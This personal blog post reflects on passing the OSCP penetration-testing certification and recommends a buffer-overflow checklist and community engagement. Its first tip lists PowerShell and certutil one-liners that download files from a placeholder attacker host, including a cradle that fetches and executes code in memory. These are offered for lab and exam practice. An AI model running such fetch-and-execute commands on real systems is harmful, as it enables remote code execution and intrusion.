OSCP - My Thoughts & Tips

Followed with profuse fist-pumping.

I recently earned my OSCP certification. So naturally I now have to be the 924348th person to share their experience about it (I also need an excuse to familiarise myself with Markdown).

Should I read this?

To preface, I'm steering clear of the standard recommendations. Much better articles on that already exist and this isn't my post on how to reinvent the wheel. If you're looking for a general purpose preparation guide then I highly recommend you check out TJNull's OSCP guide and list of OSCP-like machines..

Instead, I'll be sharing three hopefully less orthodox tips to help you through the OSCP, divulge my thoughts having completed the certification, and discuss what my next steps are.


Excellent. An amazing course with a lot to learn. OffSec's Try Harder motto is very evident in both the course's materials and training structure. I came into the OSCP quite prepared having completed eLearnSecurity's eJPT and eCPPT. Those two were very good in their own ways, but I definitely improved my pentesting skills the most by taking the OSCP.


1) Be comfortable transferring files between Kali and Windows

One thing I learned the hard way was that I wasn't very flexible with how I transferred files between Kali and Windows. I would solely rely on Nishang's Invoke-PowerShellTcp.ps1 and a single PowerShell command I noted on my cheatsheet. Sometimes a PowerShell command doesn't always work. Hell sometimes you need to embed PowerShell or CMD commands into a Python script. Here are some helpful one-liners I've had to use during the course. Add these to your command cheatsheet. Don't have one? See here for guidance.


I mean, its still PowerShell... You're gonna have to be comfortable with it. Here are multiple commands I recommend you note down:

Download to a location - Use if you have a PowerShell session
IEX(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/ExampleFile.exe', 'C:\<FilePath>\ExampleFile.exe')

Download to a location - Use if you have a CMD Prompt session
echo IEX(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/ExampleFile.exe', 'C:\<FilePath>\ExampleFile.exe') | powershell -noprofile -

Download and run the chosen file - Note this does not save the file
echo IEX(New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/ExampleFile.exe') | powershell -noprofile -

Download to a location - Use if you have a PowerShell session
invoke-webrequest -outfile ExampleFile.exe http://<IP>:<PORT>/ExampleFile.exe

Embedding PowerShell commands into a Python variable - The command in this instance is moot, pay attention to the slashes and quotation marks encapsulating the URL.
IEX(New-Object Net.WebClient).DownloadString(\'http://<IP>:<PORT>/ExampleFile.exe\')


Remember when Living off the Land was trendy? Well if you didn't want to stop at PowerShell, might I introduce you to Certutil?

Certutil is a command-line binary pre-installed on Windows. Its intended purpose is for the display, configuration and verification of certification authority information. However, it can also be used in a "wget" like manner to download files from your local machine. With a SimpleHTTPServer served on your Kali machine you can run the below to easily transfer files:

certutil -urlcache -split -f http://<IP>:<PORT>/ExampleFile.exe ExampleFile.exe

2) Have a Buffer Overflow Checklist

Yes you absolutely should be running AutoRecon while working on your Buffer Overflow machine, but hopefully you already know that.

What you may not have though is a Buffer Overflow checklist. You want to go into your exam knowing that you already have 25 points. You deserve those extra few hours you'll have saved by having a checklist. And if you're like me and tunnel-vision a lot, you'll definitely need them when you're down a rabbit hole.


The checklist I wrote up is available here. I recommend you modify it in whatever way helps you nail your methodology.

3) Engage with the community

A lot of people are working on the OSCP, some much smarter than you and I. I found engaging with the community, discussing labs and learning how others approached machines really helped improve my own skillset. If there's only one takeway from this post, it should be that you download Discord and join the following Discord servers:

I'd also recommend you subscribe to the OSCP subreddit here.

You'll find some prominent InfoSec individuals in those servers, notably OffSec staff, content creators, HTB ambassadors, and authors of well-regarded pentesting tools. They're great places to ask questions, chat about courses, take part in AMAs, compete in CTFs, and have a laugh.

Next steps?

This is a tough one I've been struggling with for the past few days. Having a structured goal to work towards really helps me focus. I'm weighing my options at the moment and they're a toss up of the following:

  • Finally learn some Active Directory and work through HTB Pro Labs and Pentest Academy's certs.
  • Get better at Web App Security and start working through the Portswigger Academy labs.
  • Explore Cloud options on ACloud.Guru and elsewhere, particularly on DevSecOps.

I haven't fully decided yet and I also have eLearnSecurity's Exploit Development (xDS) course I need to complete. I'll be working on that while tackling some HTB machines before I fully commit to one of the above.

To wrap up, OSCP? 10/10 would recommend.


Read more posts by this author.

London, United Kingdom http://xaldin.io